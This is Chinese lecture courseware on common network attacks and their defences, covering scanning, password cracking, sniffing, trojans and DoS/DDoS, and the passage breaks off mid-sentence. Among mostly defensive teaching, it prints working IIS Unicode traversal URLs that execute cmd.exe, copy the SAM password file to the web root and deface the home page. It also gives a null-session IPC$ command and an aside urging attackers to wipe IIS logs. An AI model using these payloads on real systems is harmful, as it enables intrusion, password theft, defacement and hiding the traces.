常见的网络攻击与防范课件

第五章常见的网络攻击与防范网络攻击步骤预攻击探测漏洞扫描（综合扫描）木马攻击拒绝服务攻击欺骗攻击蠕虫病毒攻击其他攻击1一、网络攻击步骤网络安全威胁国家基础设施因特网安全漏洞危害在增大信息对抗的威胁在增加电力交通通讯控制广播工业金融医疗2一、网络攻击步骤网络中存在的安全威胁网络内部、外部泄密拒绝服务攻击逻辑炸弹特洛伊木马黑客攻击计算机病毒信息丢失、篡改、销毁后门、隐蔽通道蠕虫3一、网络攻击步骤典型攻击步骤预攻击探测收集信息,如OS类型,提供的服务端口发现漏洞,采取攻击行为获得攻击目标的控制权系统继续渗透网络,直至获取机密数据消灭踪迹破解口令文件,或利用缓存溢出漏洞以此主机为跳板，寻找其它主机的漏洞获得系统帐号权限，并提升为root权限安装系统后门方便以后使用4一、网络攻击步骤典型攻击步骤图解5一、网络攻击步骤攻击手法vs.入侵者技术高低19801985199019952000密码猜测可自动复制的代码破解密码利用已知的漏洞破坏审计系统后门会话劫持消除痕迹嗅探IP欺骗GUI远程控制自动探测扫描拒绝服务www攻击攻击手法与工具入侵者技术半开隐蔽扫描控制台入侵检测网络管理DDOS攻击6二、预攻击探测预攻击概述端口扫描基础操作系统识别资源扫描与查找用户和用户组查找7二、预攻击探测1.预攻击概述Pingsweep

寻找存活主机Portscan

寻找存活主机的开放服务（端口）OSfingerprint 操作系统识别资源和用户信息扫描网络资源，共享资源，用户名和用户组等8二、预攻击探测Ping工具操作系统本身的ping工具

Ping:PacketInterNetGroper

用来判断远程设备可访问性最常用的方法

Ping原理:发送ICMPEcho消息，等待EchoReply消息可以确定网络和外部主机的状态可以用来调试网络的软件和硬件每秒发送一个包，显示响应的输出，计算网络来回的时间最后显示统计结果——丢包率9二、预攻击探测关于PingPing有许多命令行参数，可以改变缺省的行为可以用来发现一台主机是否active为什么不能ping成功？没有路由，网关设置？网卡没有配置正确增大timeout值被防火墙阻止……“Pingofdeath”发送特大ping数据包(>65535字节)导致机器崩溃许多老的操作系统都受影响10二、预攻击探测Windows平台Pinger、PingSweep、WS_PingProPack图:Pinger工具11二、预攻击探测图:PingSweep12二、预攻击探测Ping工具都是通过ICMP协议来发送数据包,那么针对这种扫描的预防措施是:使用可以检测并记录ICMP扫描的工具使用入侵检测系统在防火墙或路由器中设置允许进出自己网络的ICMP分组类型13二、预攻击探测2.端口扫描基础开放扫描(OpenScanning)需要扫描方通过三次握手过程与目标主机建立完整的TCP连接可靠性高，产生大量审计数据，容易被发现半开放扫描(Half-OpenScanning)扫描方不需要打开一个完全的TCP连接秘密扫描(StealthScanning)不包含标准的TCP三次握手协议的任何部分隐蔽性好，但这种扫描使用的数据包在通过网络时容易被丢弃从而产生错误的探测信息

14二、预攻击探测基本的TCPconnect()扫描（开放）Reverse-ident扫描（开放）TCPSYN扫描(半开放)IPIDheaderaka“dump”扫描(半开放)TCPFin扫描(秘密)TCPXMAS扫描(秘密)TCPftpproxy扫描(bounceattack)用IP分片进行SYN/FIN扫描(躲开包过滤防火墙)UDPICMP端口不可达扫描UDPrecvfrom扫描15二、预攻击探测16二、预攻击探测开放扫描TCPconnect()扫描原理扫描器调用socket的connect()函数发起一个正常的连接如果端口是打开的，则连接成功否则，连接失败优点简单，不需要特殊的权限缺点服务器可以记录下客户的连接行为，如果同一个客户轮流对每一个端口发起连接，则一定是在扫描17二、预攻击探测Reverse-ident扫描Ident协议(RFC1413)使得可以发现任何一个通过TCP连接的进程的所有者的用户名，即使该进程并没有发起该连接只有在TCP全连接之后才有效TCP端口113例如可以先连接到80端口，然后通过identd来发现服务器是否在root下运行建议关闭ident服务，或者在防火墙上禁止，除非是为了审计的目的18二、预攻击探测半开放扫描

TCPSYN扫描原理向目标主机的特定端口发送一个SYN包如果应答包为RST包，则说明该端口是关闭的否则，会收到一个SYN|ACK包。于是，发送一个RST，停止建立连接由于连接没有完全建立，所以称为“半开连接扫描”优点很少有系统会记录这样的行为缺点在UNIX平台上，需要root权限才可以建立这样的SYN数据包19二、预攻击探测IPIDheaderaka“dump”扫描由Antirez首先使用，并在Bugtraq上公布原理：扫描主机通过伪造第三方主机IP地址向目标主机发起SYN扫描，并通过观察其IP序列号的增长规律获取端口的状态优点不直接扫描目标主机也不直接和它进行连接，隐蔽性较好缺点对第三方主机的要求较高

20二、预攻击探测秘密扫描TCPFin扫描原理扫描器发送一个FIN数据包如果端口关闭的，则远程主机丢弃该包，并送回一个RST包否则的话，远程主机丢弃该包，不回送变种，组合其他的标记优点不是TCP建立连接的过程，所以比较隐蔽缺点与SYN扫描类似，也需要构造专门的数据包在Windows平台无效，总是发送RST包21二、预攻击探测TCPXMAS扫描原理扫描器发送的TCP包包头设置所有标志位关闭的端口会响应一个同样设置所有标志位的包开放的端口则会忽略该包而不作任何响应优点比较隐蔽缺点主要用于UNIX/Linux/BSD的TCP/IP的协议栈不适用于Windows系统22二、预攻击探测其他扫描TCPftpproxy扫描原理用PORT命令让ftpserver与目标主机建立连接，而且目标主机的端口可以指定如果端口打开，则可以传输否则，返回"425Can'tbuilddataconnection:Connectionrefused."Ftp这个缺陷还可以被用来向目标(邮件,新闻)传送匿名信息优点：这种技术可以用来穿透防火墙缺点：慢，有些ftpserver禁止这种特性23二、预攻击探测UDPICMP端口不可达扫描利用UDP协议（主机扫描？）原理开放的UDP端口并不需要送回ACK包，而关闭的端口也不要求送回错误包，所以利用UDP包进行扫描非常困难有些协议栈实现的时候，对于关闭的UDP端口，会送回一个ICMPPortUnreach错误缺点速度慢，而且UDP包和ICMP包都不是可靠的需要root权限，才能读取ICMPPortUnreach消息一个应用例子Solaris的rpcbind端口(UDP)位于32770之上，这时可以通过这种技术来探测24二、预攻击探测端口扫描对策设置防火墙过滤规则，阻止对端口的扫描例如可以设置检测SYN扫描而忽略FIN扫描使用入侵检测系统禁止所有不必要的服务，把自己的暴露程度降到最低Unix或linux中，在/etc/inetd.conf中注释掉不必要的服务，并在系统启动脚本中禁止其他不必要的服务Windows中通过Services禁止敏感服务，如IIS25二、预攻击探测端口扫描工具图:NetScanTools26二、预攻击探测图:WinScan27二、预攻击探测图:SuperScan28二、预攻击探测图:Nmap29二、预攻击探测图:X-scan30二、预攻击探测3.操作系统的识别操作系统辨识的动机许多漏洞是系统相关的，而且往往与相应的版本对应从操作系统或者应用系统的具体实现中发掘出来的攻击手段都需要辨识系统操作系统的信息还可以与其他信息结合起来，比如漏洞库，或者社会诈骗(社会工程，socialengineering)如何辨识一个操作系统一些端口服务的提示信息，例如，telnet、http、ftp等服务的提示信息TCP/IP栈指纹DNS泄漏出OS系统31二、预攻击探测图:winfingerprint32二、预攻击探测4.资源扫描与查找

资源扫描用户扫描网络资源和共享资源，如目标网络计算机名、域名和共享文件等等；而用户扫描则用户扫描目标系统上合法用户的用户名和用户组名。这些扫描都是攻击目标系统的很有价值的信息，而Windows系统，特别是WindowsNT/2000在这些方面存在着严重的漏洞，很容易让非法入侵者获取到关于该目标系统的很多有用信息，如共享资源、Netbios名和用户组等。采用协议：NetBIOS协议、CIFS/SMB协议和空会话常用工具：NetViewNbtstat和NbtscanLegion和Shed33二、预攻击探测NetView

在命令行中输入“netview/domain”命令，可以获取网络上可用的域34二、预攻击探测在命令行中输入“netview/domain：domain_name”命令，可以获取某一域中的计算机列表，其中domain_name为要列表计算机的域名。

在命令行中输入“netview\\computer_name”命令，可以获取网络某一计算机的共享资源列表，其中computer_name为计算机名。35二、预攻击探测nbtstat和nbtscan

nbtstat（NetBIOSoverTCP/IP）是WindowsNT/2000内置的命令行工具，利用它可以查询涉及到NetBIOS信息的网络机器。另外，它还可以用来消除NetBIOS高速缓存器和预加载LMHOSTS文件等。这个命令在进行安全检查时非常有用。利用nbtstat查看目标系统NetBIOS列表36二、预攻击探测Nbtstat本身有一些缺陷，如一次只能扫描一台主机等，nbtscan（http://www.abb.aha.ru/software/nbtscan.html）却可以对一个网段进行扫描,利用nbtscan对网段进行扫描。

37二、预攻击探测Legion和Shed

在NetBIOS扫描中，很重要的一项就是扫描网络中的共享资源，以窃取资源信息或植入病毒木马。Legion和Shed就是其中的典型。Legion的共享资源扫描可以对一个IP或网段进行扫描，它还包含一个共享密码的蛮力攻击工具，如“ShowBFTool”按钮。主要用于Windows2000以前的操作系统中38二、预攻击探测Shed是一个速度很快的共享资源扫描工具，它可以显示所有的共享资源，包含隐藏的共享。39二、预攻击探测空会话原理利用WindowsNT/2000对NetBIOS的缺省信赖通过TCP端口139返回主机的大量信息实例如果通过端口扫描获知TCP端口139已经打开netuse\\30\IPC$""/USER:""在攻击者和目标主机间建立连接

Windows2000还有另一个SMB端口445预防资源扫描和查找的方法：

防范NetBIOS扫描的最直接方法就是不允许对TCP/UDP135到139端口的访问，如通过防火墙或路由器的配置等。另外，对单独的主机，可使用NetBIOSoverTCP/IP项失效或注册表配置来实现。Windows2000操作系统还要禁止445端口。40二、预攻击探测5.用户和用户组查找利用前面介绍的方法，可以很容易获取远程WindowsNT/2000主机的共享资源、NetBIOS名和所处的域信息等。但黑客和非法入侵者更感兴趣的是通过NetBIOS扫描，获取目标主机的用户名列表。如果知道了系统中的用户名（即账号）后，就可以对该账号对应的口令进行猜测攻击（有些口令往往很简单），从而对远程目标主机进行更深入的控制。在WindowsNT/2000的资源工具箱NTRK中提供了众多的工具用于显示远程主机用户名和组信息，如前面介绍的nbtstat和nbtscan,另外还有UsrStat等工具41二、预攻击探测UsrStat

UsrStat是一个命令行工具，用于显示一个给定域中的每一个用户的用户名、全名和最后的登录日期与时间，如图所示，可显示域中计算机上的用户信息。42三、漏洞扫描口令破解网络嗅探漏洞攻击综合扫描43三、漏洞扫描漏洞扫描是一种最常见的攻击模式，用于探测系统和网络漏洞，如获取系统和应用口令，嗅探敏感信息，利用缓存区溢出直接攻击等。针对某一类型的漏洞，都有专门的攻击攻击。另外，也有一些功能强大综合扫描工具，针对系统进行全面探测和漏洞扫描，如流光等。44三、漏洞扫描1.口令破解系统漏洞

利用系统漏洞直接提取口令暴力穷举完全取决于机器的运算速度字典破解大大减少运算的次数，提高成功率45三、漏洞扫描图：NT/2000密码---LC3工具46三、漏洞扫描针对口令破解攻击的防范措施安装入侵检测系统，检测口令破解行为安装安全评估系统，先于入侵者进行模拟口令破解，以便及早发现弱口令并解决提高安全意识，避免弱口令47三、漏洞扫描2.网络嗅探

网络嗅探是主机的一种工作模式，在这种模式下，主机可以接收到共享式网段在同一条物理通道上传输的所有信息，而不管这些信息的发送方和接受方是谁。此时，如果两台主机进行通信的信息没有加密，只要使用某些网络监听工具，例如,SnifferPro,NetXray，tcpdump，Dsniff等就可以轻而易举地截取包括口令、帐号等敏感信息。共享信道

广播型以太网协议不加密

口令明文传输混杂模式

处于这种模式的网卡接受网络中所有数据包48三、漏洞扫描针对口令破解攻击的防范措施安装VPN网关，防止对网间网信道进行嗅探对内部网络通信采取加密处理采用交换设备进行网络分段采取技术手段发现处于混杂模式的主机，发掘“鼹鼠”49三、漏洞扫描3.漏洞攻击

漏洞即某个程序(包括操作系统)在设计时未考虑周全，当程序遇到一个看似合理，但实际无法处理的问题时，引发的不可预见的错误。

漏洞的产生大致有三个原因：编程人员的人为因素，在程序编写过程，为实现不可告人的目的，在程序代码的隐蔽处保留后门。受编程人员的能力、经验和当时安全技术所限，在程序中难免会有不足之处，轻则影响程序效率，重则导致非授权用户的权限提升。由于硬件原因，使编程人员无法弥补硬件的漏洞，从而使硬件的问题通过软件表现50三、漏洞扫描VulnerabilityWindowsVulnerabilityScanner是一个系统漏洞维护工具

弱点、漏洞。任何系统都存在漏洞。exploit针对漏洞开发的应用程序。exploit就是利用一切可以利用的工具、采用一切可以采用的方法、找到一切可以找到的漏洞，并且通过对漏洞资料的分析研究，从而达到获取网站用户资料文档、添加自定义用户、甚至侵入网站获得管理员权限控制整个网站的最终目的。51三、漏洞扫描常见漏洞攻击实例Unicode漏洞

Unicode漏洞编码在中文WindowsNT中为：

%c1%1c（代表(0xc1-0xc0)*0x40+0x1c=0x5c=＇/＇）和

%c0%2f（代表(0xc0-0xcx)*0x40+0x2f=0x2f=＇\＇）在英文版中为%c0%af（但%c1%pc、%c0%9v、

%c0%qf、%c1%8s等几个编码也可能有效）。

通过这几个编码我们可以通过在浏览器上获得有Unicode漏洞的机器的文件控制权。

简单的检测办法是在浏览器里面输入：http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../

winnt/system32/cmd.exe?/c+dir，如果显示：

DirectoryofD:\Inetpub\scripts

01-05-0202:32a.

01-05-0202:32a..

00-12-1805:50p

samples

……

说明网站存在漏洞，如果不显示该页面，也可能是因为Scripts目录改名了，我们可以试着输入：

http://xxx.xxx.xxx.xxx/msabc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/

cmd.exe?/c+dir，如果显示像上面一样的目录，表明存在漏洞。（例子中xxx.xxx.xxx.xxx为服务器的IP地址，在DOS窗口用ping命令即可获得）

如果还是没有显示该页面，可用上述其他代码：如%%c0%af代替%c1%1c试试。52三、漏洞扫描Unicode漏洞攻击

通过Unicode漏洞就可以使攻击者在浏览器执行DOS命令，如：

http://xxx.xxx.xxx.xxx/scripts/..Á../winnt/system32/cmd.exe?/c+dir+c

这条命令将使服务器列出C盘所有目录文件。

http://xxx.xxx.xxx.xxx/scripts/..Á../winnt/system32/cmd.exe?+copy+c:

\winnt\rapair|sam._+c:\inetpub\wwwroot\

这将使服务器执行一个复制C盘WinNT目录下sam._到wwwroot文件夹的命令(sam.保存了经过加密的WindowsNT系统密码文件，如果攻击者下载这一文件，可以在本机用工具解得用户密码)。

利用Echo命令即可通过浏览器直接更改网站的主页，如想修改

c:\inetpub\wwwroot\index.asp，攻击者可以通过在浏览器的地址栏输入：

http://xxx.xxx.xxx.xxx/scripts/..Á../winnt/system32/cmd.exe?/

c+echo+Your+Site+Has+Been+Hacked+>c:\inetpub\wwwroot\index.asp

攻击者还可以利用FTP、TFTP上载木马程序及提升管理权限的程序到被攻击的服务器上,,也可以通过建立一个BAT或ASP文件直接获得系统权限从而控制整个系统。

53三、漏洞扫描如何防范Unicode编码攻击

Unicode编码漏洞最好的修补方式是下载安装微软提供的补丁IIS4.0补丁和IIS5.0补丁可以通过查看winnt\system32\logfiles下的W3SVC1目录的log文件，确定是否有人利用Unicode漏洞攻击你的主机（根据设置不同也可能是在W3SVC2或者W3SVC3目录下，黑客们攻击网站后记住删除这个目录下的文件啊！！）Unicode漏洞给网络安全管理员配置系统的几个启示：在安装WindowsNT系统的时候，不要按照系统的默认目录把Wwindows安装在WinNT目录下，把WinNT目录改名将使攻击者难于猜中命令执行目录；应该把/WinNT/System32目录下的cmd.exe和net.exe改名或者删除，这样攻击者就无法找到执行命令的文件；应该把WEB服务器所有的默认安装的执行目录删除，包括Samples、Scripts及Cgi－bin，这些目录如果被上传可执行文件，即可能对系统造成重大威胁，如果需要可执行目录，则自己建一个不与默认执行目录同名的目录；网络管理员应该把系统日记文件目录移到一个更隐蔽的地方，这样攻击者就不容易找到系统记录文件加以清除了。54三、漏洞扫描针对漏洞扫描的预防措施安装防火墙，禁止访问不该访问的服务端口，使用NAT隐藏内部网络结构安装入侵检测系统，检测漏洞扫描行为安装安全评估系统，先于入侵者进行漏洞扫描，以便及早发现问题并解决提高安全意识，经常给操作系统和应用软件打补丁**windows2000/XP漏洞攻击参见“windows漏洞”55三、漏洞扫描4.综合扫描安全扫描审计分类网络安全扫描系统安全扫描优点较全面检测流行漏洞降低安全审计人员的劳动强度防止最严重的安全问题缺点无法跟上安全技术的发展速度只能提供报告，无法实际解决可能出现漏报和误报56三、漏洞扫描市场部工程部router开发部InternetServersFirewall图：综合扫描应用57三、漏洞扫描对系统进行安全评估

为堵死安全策略和安全措施之间的缺口,必须从以下三方面对网络安全状况进行评估:从企业外部进行评估:考察企业计算机基础设施中的防火墙;从企业内部进行评估:考察内部网络系统中的计算机；从应用系统进行评估:考察每台硬件设备上运行的操作系统。

综合扫描工具流光X-ScannerCIS扫描器58四、木马攻击木马概述木马的组成木马分类木马常用的欺骗方法针对木马攻击的防范措施59四、木马与后门攻击1.木马概述

特洛伊木马程序可以直接侵入用户的电脑并进行破坏，它常被伪装成工具程序或者游戏等诱使用户打开带有木马程序的邮件附件或从网上直接下载，一旦用户打开了这些邮件的附件或者执行了这些程序之后，它们就会在计算机系统中隐藏一个可以在启动时悄悄执行的程序。这种远程控制工具可以完全控制受害主机，危害极大。Windows下：Netbus、subseven、BO2000、冰河、网络神偷UNIX下：Rhost++、Login后门、rootkit等60四、木马与后门攻击2.木马的组成

对木马程序而言，它一般包括两个部分：客户端和服务器端。服务器端安装在被控制的计算机中，它一般通过电子邮件或其他手段让用户在其计算机中运行，以达到控制该用户计算机的目的。客户端程序是控制者所使用的，用于对受控的计算机进行控制。服务器端程序和客户端程序建立起连接就可以实现对远程计算机的控制了。木马运行时，首先服务器端程序获得本地计算机的最高操作权限，当本地计算机连入网络后，客户端程序可以与服务器端程序直接建立起连接，并可以向服务器端程序发送各种基本的操作请求，并由服务器端程序完成这些请求，也就实现对本地计算机的控制了。

备注：木马发挥作用必须要求服务器端程序和客户端程序同时存在，所以必须要求本地机器感染服务器端程序。服务器端程序是可执行程序，可以直接传播，也可以隐含在其他的可执行程序中传播，但木马本身不具备繁殖性和自动感染的功能。61四、木马与后门攻击3.木马分类远程访问型木马：是现在最广泛的特洛伊木马，它可以访问受害人的硬盘，并对其进行控制。这种木马用起来非常简单，只要某用户运行一下服务端程序，并获取该用户的IP地址，就可以访问该用户的计算机。这种木马可以使远程控制者在本地机器上做任意的事情，比如键盘记录、上传和下载功能、截取屏幕等等。这种类型的木马有著名的BO（BackOffice）和国产的冰河等。密码发送型木马：其目的是找到所有的隐藏密码，并且在受害者不知道的情况下把它们发送到指定的信箱。大多数这类的木马不会在每次的Windows重启时重启，而且它们大多数使用25端口发送E--mail。62四、木马与后门攻击键盘记录型木马：其非常简单的，它们只做一种事情，就是记录受害者的键盘敲击，并且在LOG文件里做完整的记录。这种特洛伊木马随着Windows的启动而启动，知道受害者在线并且记录每一件事。

毁坏型木马：其唯一功能是毁坏并且删除文件。这使它们非常简单，并且很容易被使用。它们可以自动地删除用户计算机上的所有的.DLL、INI或EXE文件。FTP型木马：其打开用户计算机的21端口（FTP所使用的默认端口），

使每一个人都可以用一个FTP客户端程序来不用密码连接到该计算机，并且可以进行最高权限的上传下载63四、木马与后门攻击捆绑欺骗：如把木马服务端和某个游戏捆绑成一个文件在邮件中发给别人；危险下载点：攻破一些下载站点后，下载几个下载量大的软件，捆绑上木马，再悄悄放回去让别人下载；或直接将木马改名上载到FTP网站上，等待别人下载；文件夹惯性点击：把木马文件伪装成文件夹图标后，放在一个文件夹中，然后在外面再套三四个空文件夹；zip伪装：将一个木马和一个损坏的zip包捆绑在一起，然后指定捆绑后的文件为zip图标；网页木马64四、木马与后门攻击4.木马常用的欺骗方法木马隐藏方式：在任务栏中隐藏；在任务管理器中隐形；悄没声息地启动：如启动组、win.ini、system.ini、注册表等；注意自己的端口；伪装成驱动程序及动态链接库：如Kernl32.dll，sysexlpr.exe

等。65四、木马与后门攻击一般情况下，木马在运行后，都会修改系统，以便下一次系统启动时自动运行该木马程序。修改系统的方法有下面几种：利用Autoexec.bat和Config.sys进行加载;修改注册表;修改win.ini文件;感染Windows系统文件,以便进行自动启动并达到自动隐藏的目的.66四、木马与后门攻击5.冰河演示国内黑客组织编写；分为服务器端和客户端：G_Server.exe和G_Client.exe功能齐全：跟踪屏幕变化；记录各种口令；获取系统信息；控制系统；注册表操作；文件操作；点对点通信缺省使用7626端口67四、木马与后门攻击68四、木马与后门攻击69四、木马与后门攻击5.针对木马攻击的预防措施安装防火墙，禁止访问不该访问的服务端口，使用NAT隐藏内部网络结构安装防病毒软件提高安全意识，尽量避免使用来历不明的软件防范：端口扫描；查看连接；检查注册表；查找文件；杀病毒软件或木马清除软件。70五、拒绝服务攻击拒绝服务攻击分布式拒绝服务攻击71五、拒绝服务攻击1.拒绝服务攻击DoS（DenialofService）是一种利用合理的服务请求占用过多的服务资源，从而使合法用户无法得到服务响应的网络攻击行为。被DoS攻击时的现象大致有：

*被攻击主机上有大量等待的TCP连接；

*被攻击主机的系统资源被大量占用，造成系统停顿；

*网络中充斥着大量的无用的数据包，源地址为假地址；

*高流量无用数据使得网络拥塞，受害主机无法正常与外界通讯；

*利用受害主机提供的服务或传输协议上的缺陷，反复高速地发出特定的服务请求，使受害主机无法及时处理所有正常请求；

*严重时会造成系统死机。72五、拒绝服务攻击常见的拒绝服务攻击SYNFoold攻击是利用TCP协议缺陷，发送大量伪造的TCP连接请求，使被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。SYNFlood攻击的过程在TCP协议中被称为三次握手(Three-wayHandshake)，而SYNFlood拒绝服务攻击就是通过三次握手而实现的。三次握手简介：首先，请求端（客户端）发送一个包含SYN标志的TCP报文，SYN即同步（Synchronize），同步报文会指明客户端使用的端口以及TCP连接的初始序号。服务器在收到客户端的SYN报文后，将返回一个SYN+ACK的报文，表示客户端的请求被接受，同时TCP序号被加一，ACK即确认（Acknowledgement）。

最后，客户端也返回一个确认报文ACK给服务器端，同样TCP序列号被加1，到此一个TCP连接完成。73五、拒绝服务攻击SYN-Flooding攻击演示SYN（我可以和你连接吗？）ACK|SYN（可以，请确认！）ACK（确认连接）发起方应答方正常的三次握手建立通讯的过程74五、拒绝服务攻击攻击者受害者攻击者伪造源地址进行SYN请求为何还没回应就是让你白等不能建立正常的连接其它正常用户得不到响应SYN（我可以和你连接吗？）ACK|SYN（可以，请确认！）？？？75五、拒绝服务攻击攻击者目标攻击者伪造源地址进行SYN请求好像不管用了其它正常用户能够得到响应SYNACK|SYN？？？SYNACKACK|SYNSYN-Flooding攻击的防范措施76五、拒绝服务攻击UDP-Flood攻击原理：

攻击者利用简单的TCP/IP服务，如Chargen和Echo来传送毫无用处的占满带宽的数据。通过伪造与某一主机的Chargen服务之间的一次的UDP连接，回复地址指向开着Echo服务的一台主机，这样就生成在两台主机之间存在很多的无用数据流，这些无用数据流就会导致带宽的服务攻击。

**chargen:字符产生的缩写，输出一个可打印字符的旋转序列，用于测试字符终端设备**

77五、拒绝服务攻击UDPFlooder演示78五、拒绝服务攻击杜绝UDP攻击的方法

关掉不必要的TCP/IP服务;配置防火墙以阻断来自Internet的UDP服务请求不过这可能会阻断一些正常的UDP服务请求。

79五、拒绝服务攻击SMURF攻击原理：

Smurf是一种具有放大效果的DoS攻击，具有很大的危害性。这种攻击形式利用了TCP/IP中的定向广播的特性，共有三个参与角色：受害者、帮凶（放大网络，即具有广播特性的网络）和攻击者。攻击者向放大网络中的广播地址发送源地址（假冒）为受害者系统的ICMP回射请求，由于广播的原因，放大网络上的所有系统都会向受害者系统做出回应，从而导致受害者不堪重负而崩溃。80五、拒绝服务攻击81五、拒绝服务攻击检测：如果在网络内检测到目标地址为广播地址的ICMP包。证明内部有人发起了这种攻击（或者是被用作攻击，或者是内部人员所为）；如果ICMP包的数量在短时间内上升许多(正常的ping程序每隔一秒发一个ICMPecho请求)，证明有人在利用这种方法攻击系统。预防Smurf攻击为了防止成为DoS的帮凶，最好关闭外部路由器或防火墙的广播地址特性；为了防止被攻击，在防火墙上过滤掉ICMP报文，或者在服务器上禁止Ping，并且只在必要时才打开ping服务。

Smurf还有一个变种为Fraggle攻击，它利用UDP来代替ICMP包。

82五、拒绝服务攻击眼泪攻击原理：利用在TCP/IP堆栈中实现信任IP碎片中的包的标题头所包含的信息来实现自己的攻击。IP分段含有指明该分段所包含的是原包的哪一段的信息，某些TCP/IP(包括servicepack4以前的NT)在收到含有重叠偏移的伪造分段时将崩溃。

防御泪滴攻击的最好办法升级服务包软件，如下载操作系统补丁或升级操作系统等;

在设置防火墙时对分组进行重组，而不进行转发，这样也可以防止这种攻击。83五、拒绝服务攻击Land攻击原理：用一个特别打造的SYN包，它的源地址和目标地址都被设置成某一个服务器地址。此举将导致接收服务器向它自己的地址发送SYN+ACK消息，结果这个地址又发回ACK消息并创建一个空连接。被攻击的服务器每接收一个这样的连接都将保留，直到超时，对Land攻击反应不同，许多UNIX实现将崩溃，NT变的极其缓慢(大约持续5分钟)。LAND攻击预防:

预防LAND攻击最好的办法是配置防火墙，对哪些在外部接口入站的含有内部源地址的数据包过滤。84五、拒绝服务攻击针对拒绝服务攻击的防范措施安装防火墙，禁止访问不该访问的服务端口，过滤不正常的畸形数据包，使用NAT隐藏内部网络结构安装入侵检测系统，检测拒绝服务攻击行为安装安全评估系统，先于入侵者进行模拟攻击，以便及早发现问题并解决提高安全意识，经常给操作系统和应用软件打补丁85五、拒绝服务攻击2.分布式拒绝服务攻击DDOSDDOS则是利用多台计算机，采用了分布式对单个或者多个目标同时发起DoS攻击。其特点是:目标是“瘫痪敌人”，而不是传统的破坏和窃密;利用国际互联网遍布全球的计算机发起攻击，难于追踪。DDoS攻击由三部分组成

客户端程序（黑客主机）

控制点（Master）

代理程序（Zombie），或者称为攻击点（daemon）86五、拒绝服务攻击DDOS攻击分类带宽耗尽型是堵塞目标网络的出口，导致带宽消耗不能提供正常的上网服务。例如常见的Smurf攻击、UDPFlood攻击、MStreamFlood攻击等。针对此类攻击一般采取的措施就是QoS，在路由器或防火墙上针对此类数据流限制流量，从而保证正常带宽的使用。单纯带宽耗尽型攻击较易被识别，并被丢弃。资源耗尽型攻击者利用服务器处理缺陷，消耗目标服务器的关键资源，例如CPU、内存等，导致无法提供正常服务。例如常见的SynFlood攻击、NAPTHA攻击等。资源耗尽型攻击利用系统对正常网络协议处理的缺陷，使系统难于分辨正常流和攻击流，导致防范难度较大，是目前业界最关注的焦点问题，例如方正SynGate产品就是专门防范此类的产品。87五、拒绝服务攻击被DDoS攻击时的现象：

*被攻击主机上有大量等待的TCP连接

*网络中充斥着大量的无用的数据包，源地址为假

*制造高流量无用数据，造成网络拥塞，使受害主机无法正常和外界通讯

*利用受害主机提供的服务或传输协议上的缺陷，反复高速的发出特定的服务请求，使受害主机无法及时处理所有正常请求

*严重时会造成系统死机

88五、拒绝服务攻击分布式拒绝服务攻击网络结构图客户端客户端主控端主控端主控端主控端代理端代理端代理端代理端代理端代理端代理端代理端89五、拒绝服务攻击分布式拒绝服务攻击步骤不安全的计算机扫描程序Hacker攻击者使用扫描工具探测扫描大量主机以寻找潜在入侵目标。1Internet90五、拒绝服务攻击Hacker被控制的计算机(代理端)黑客设法入侵有安全漏洞的主机并获取控制权。这些主机将被用于放置后门、sniffer或守护程序甚至是客户程序。2Internet91五、拒绝服务攻击Hacker

黑客在得到入侵计算机清单后，从中选出满足建立网络所需要的主机，放置已编译好的守护程序，并对被控制的计算机发送命令。3被控制计算机（代理端）MasterServerInternet92五、拒绝服务攻击Hacker

UsingClientprogram,

黑客发送控制命令给主机，准备启动对目标系统的攻击4被控制计算机（代理端）TargetedSystemMasterServerInternet93五、拒绝服务攻击InternetHacker

主机发送攻击信号给被控制计算机开始对目标系统发起攻击。5MasterServerTargetedSystem被控制计算机（代理端）94五、拒绝服务攻击TargetedSystemHacker目标系统被无数的伪造的请求所淹没，从而无法对合法用户进行响应，DDOS攻击成功。6MasterServerUserRequestDeniedInternet被控制计算机（代理端）95五、拒绝服务攻击MasterMasterMasterFloodingFloodingFloodingFloodingFloodingFlooding攻击目标攻击者MasterMasterMaster96五、拒绝服务攻击预防DDOS攻击的措施确保主机不被入侵且是安全的；周期性审核系统；检查文件完整性；优化路由和网络结构；优化对外开放访问的主机；在网络上建立一个过滤器（filter）或侦测器（sniffer），在攻击信息到达网站服务器之前阻挡攻击信息。97五、拒绝服务攻击对付DDOS的攻击的方法定期扫描现有的网络主节点，清查可能存在的安全漏洞。对新出现的漏洞及时进行清理。骨干节点的计算机因为具有较高的带宽，是黑客利用最佳位置，因此对这些主机本身加强主机安全是非常重要的。在骨干节点上的防火墙的配置至关重要。防火墙本身能抵御DDOS攻击和其它一些攻击。在发现受到攻击的时候，可以将攻击导向一些牺牲主机，这样保护真正的主机不被瘫痪。用足够的机器承受黑客攻击。这是一种较为理想的应对策略。如果用户拥有足够的容量和足够的资源给黑客攻击，在它不断访问用户、夺取用户资源之时，自己的能量也在逐渐耗失，或许未等用户被攻死，黑客已无力支招儿。

使用Inexpress、ExpressForwarding过滤不必要的服务和端口，即在路由器上过滤假IP。比如Cisco公司的CEF（CiscoExpressForwarding）可以针对封包SourceIP和RoutingTable做比较，并加以过滤。98五、拒绝服务攻击充分利用网络设备保护网络资源。所谓网络设备是指路由器、防火墙等负载均衡设备，它们可将网络有效地保护起来。当网络被攻击时最先死掉的是路由器，但其他机器没有死。死掉的路由器经重启后会恢复正常，而且启动起来还很快，没有什么损失。若其他服务器死掉，其中的数据会丢失，而且重启服务器又是一个漫长的过程。使用UnicastReversePathForwarding检查访问者的来源。它通过反向路由表查询的方法检查访问者的IP地址是否是真，如果是假的，它将予以屏蔽。许多黑客攻击常采用假IP地址方式迷惑用户，很难查出它来自何处，因此，利用UnicastReversePathForwarding可减少假IP地址的出现，有助于提高网络安全性。限制SYN/ICMP流量。用户应在路由器上配置SYN/ICMP的最大流量来限制SYN/ICMP封包所能占有的最高频宽，这样，当出现大量的超过所限定的SYN/ICMP流量时，说明不是正常的网络访问，而是有黑客入侵。99五、拒绝服务攻击怎样对付正在进行的DDOS攻击？如果用户正在遭受攻击，他所能做的抵御工作非常有限。因为在原本没有准备好的情况下有大流量的灾难性攻击冲向用户，很可能用户在还没回过神之际，网络已经瘫痪。但是，用户还是可以抓住机会寻求一线希望的。首先，检查攻击来源，通常黑客会通过很多假的IP地址发起攻击，此时，用户若能够分辨出哪些是真IP地址，哪些是假IP地址，然后了解这些IP来自哪些网段，再找网段管理员把机器关掉，即可消除攻击。其次，找出攻击者所经过的路由，把攻击